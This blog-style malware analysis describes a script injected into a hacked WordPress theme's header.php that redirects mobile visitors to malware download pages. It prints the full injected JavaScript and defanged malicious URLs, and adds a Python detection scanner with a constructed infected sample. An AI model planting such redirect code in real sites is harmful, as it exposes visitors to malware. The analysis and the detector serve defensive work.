Website Malware Targets Mobile Platforms

Navigating the web on a mobile device can be tricky even when you’re browsing clean sites. If hackers are involved, the frustration of a pop-up can turn into the dangerous possibility of harmful mobile malware.

The increase in mobile internet browsing has prompted attackers to adapt their techniques, targeting mobile-specific platforms and distributing spam and malware to these devices. Being proactive about the security of your site is key to keeping your visitors safe whether they’re on a desktop, laptop, tablet or phone.

Mobile Browser Redirects from Hacked Sites

Hackers are taking advantage of the growing mobile audience by showing mobile visitors unwanted pop-ups and redirecting them to malicious sites. Recently, we analyzed a hacked site that was exhibiting exactly this behavior. During our investigation, we found the following code injected into the header.php file of the theme:

<script>
if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("ooglebot")==-1){if(/(android|bb\d+|meego).+mobile
|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox
|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|
xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)
|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|
cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|
fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|
tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|emu|jigs|kddi|keji|kgt( |\/)|klon|kpt |
kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)
|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)
|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a
|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|
ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-
|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60
|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){
var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}}
)(navigator.userAgent||navigator.vendor||window.opera,'hxxp://185(.)93(.)187(.)41/kt/JpNx9n');}
</script>

This code specifically targets mobile devices and redirects them to a series of malicious websites:

  • Starting from: hxxp://185(.)93(.)187(.)41/kt/JpNx9n
  • Then, going to different sub-pages, such as hxxp://www(.)bestphoneapps(.)mobi (which is involved in malware campaigns)
  • Finally landing on hxxps://mobrevflwms(.)com, also related to malware campaigns
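The script above only fires when three conditions hold at once: no _mauthtoken cookie is present, the user agent does not contain "ooglebot", and the user agent matches the long mobile-device regex. It then sets the cookie for 30 minutes (1800000 ms) before redirecting, so a desktop browser, a crawler, or a mobile visitor who was already redirected once never sees the redirect. The following Python scanner, an added example rather than code from this post or from SiteCheck, looks for that combination of indicators in theme and plugin files and reports the cookie name, the suppression window and any absolute URLs found. The indicator patterns are taken from the script as shown; the two sample file contents and the redirect host redirect-host.invalid are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Flag theme/plugin files carrying the mobile-redirect injection pattern.

Added example, not the post's or SiteCheck's code. Indicator patterns are
derived from the injected script shown above; the sample file contents and
the redirect host (redirect-host.invalid) are constructed.
"""
import re
import sys
from dataclasses import dataclass, field
from pathlib import Path
from typing import Dict, List, Optional

# Component patterns of the injection. Each occurs in legitimate code too (the
# long UA regex is a widely copied UA sniffer), so a file is reported only when
# all four appear together: cookie gate + crawler exclusion + mobile UA test
# + unconditional redirect.
PATTERNS = {
    "cookie_gate": re.compile(r'document\.cookie\.indexOf\("([^"]+)"\)\s*==\s*-1'),
    "crawler_exclusion": re.compile(r'\.indexOf\("ooglebot"\)\s*==\s*-1'),
    "mobile_ua_test": re.compile(re.escape("/(android|bb\\d+|meego).+mobile")),
    "redirect": re.compile(r"window\.location\s*=\s*\w+"),
}
COOKIE_TTL = re.compile(r"new Date\(\)\.getTime\(\)\s*\+\s*(\d+)")
URLS = re.compile(r"""['"](https?://[^'"]+)['"]""")


@dataclass
class Finding:
    matched: List[str]
    cookie_name: Optional[str] = None
    cookie_ttl_minutes: Optional[float] = None
    urls: List[str] = field(default_factory=list)


def scan_source(src: str) -> Optional[Finding]:
    """Return a Finding when src carries the complete signature, else None."""
    matched = [name for name, pat in PATTERNS.items() if pat.search(src)]
    if len(matched) < len(PATTERNS):
        return None
    cookie = PATTERNS["cookie_gate"].search(src).group(1)
    ttl = COOKIE_TTL.search(src)
    # The TTL is milliseconds added to "now"; 1800000 ms is the 30-minute
    # window during which the redirect will not fire again for that browser.
    minutes = int(ttl.group(1)) / 60_000 if ttl else None
    return Finding(matched, cookie, minutes, URLS.findall(src))


def scan_directory(root: Path, suffixes=(".php", ".js", ".html")) -> Dict[str, Finding]:
    """Scan every file under root whose suffix is in suffixes."""
    results: Dict[str, Finding] = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            hit = scan_source(path.read_text(errors="replace"))
            if hit:
                results[str(path)] = hit
    return results


# Constructed samples: a header.php with the injection (UA regex shortened, host
# replaced by a placeholder) and a clean header that also sniffs the user agent,
# which shows why a single indicator is not enough to raise an alert.
INFECTED_SAMPLE = r"""<?php /* constructed, modelled on the injection above */ ?>
<script>
if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("ooglebot")==-1){if(/(android|bb\d+|meego).+mobile|blackberry|iemobile|ip(hone|od|ad)|opera m(ob|in)i|windows ce/i.test(a)){
var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}}
)(navigator.userAgent||navigator.vendor||window.opera,'http://redirect-host.invalid/kt/example');}
</script>
"""
CLEAN_SAMPLE = """<?php wp_head(); ?>
<script>
if (/(android|bb\\d+|meego).+mobile/i.test(navigator.userAgent)) {
  document.documentElement.classList.add("is-mobile");  // layout only, no redirect
}
</script>
"""

if __name__ == "__main__":
    # Usage: python scan_redirect.py [theme-or-plugin-directory]
    if len(sys.argv) > 1:
        for name, hit in scan_directory(Path(sys.argv[1])).items():
            print(f"{name}: cookie={hit.cookie_name} ttl={hit.cookie_ttl_minutes}min urls={hit.urls}")
    else:
        for label, src in (("INFECTED_SAMPLE", INFECTED_SAMPLE), ("CLEAN_SAMPLE", CLEAN_SAMPLE)):
            print(label, "->", scan_source(src))
```

Run it against a WordPress wp-content directory to list every file that carries the full pattern; the clean sample is deliberately matched by the mobile regex alone, and is not reported, because legitimate responsive themes use the same user-agent test. Treat the reported URLs as indicators to block at the edge and to search for in other files, since the post notes the first hop is only the start of a redirect chain.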

Mobile and Desktop Malware Downloads

Depending on the mobile browser and device your visitors are using while accessing the website, victims are either presented with a toolbar download page or are redirected to a mobile app download page. Both of these scenarios put website visitors in a dangerous position. If victims inadvertently add the mobile malware components to their devices, there can be serious consequences.

A few of the dangers of mobile malware include:

  • Allowing attackers to arbitrarily access, read, and interact with emails and backend interfaces;
  • Theft of data such as media files;
  • Ads being injected into pages where they do not belong;
  • Leaking sensitive information from the victim's browsing activity;

If visitors happen to find themselves on those pages on Desktop they may be exposed to situations such as:

  • Potential installation of ransomware;
  • Installation of PUPs (potentially unwanted programs, such as ad injectors);
  • Installation of keyloggers;
  • Installation of rootkits, or having your computer added to a botnet and used against other targets;
  • Covert takeover of your browser, allowing actions to be carried out in any backend you have access to, such as any website you own or manage;

As a rule of thumb, it's best to never install anything you don't explicitly mean to, and if you find yourself on a page that has no relation to the website you were visiting, leave it immediately.

Protecting Your Site

As website owners, it’s our responsibility to ensure that our visitors have the best experience possible and will not be at risk when accessing our web properties.

If you’re concerned about your site, or a site that you’re visiting, scanning the site can provide some insight. Our free online scanner (SiteCheck) is tailored to emulate different mobile user agents and warn users about possible issues that may affect your computer when accessing a particular website.

If you are detecting similar redirects or suspect any unusual behavior, we are here to help.
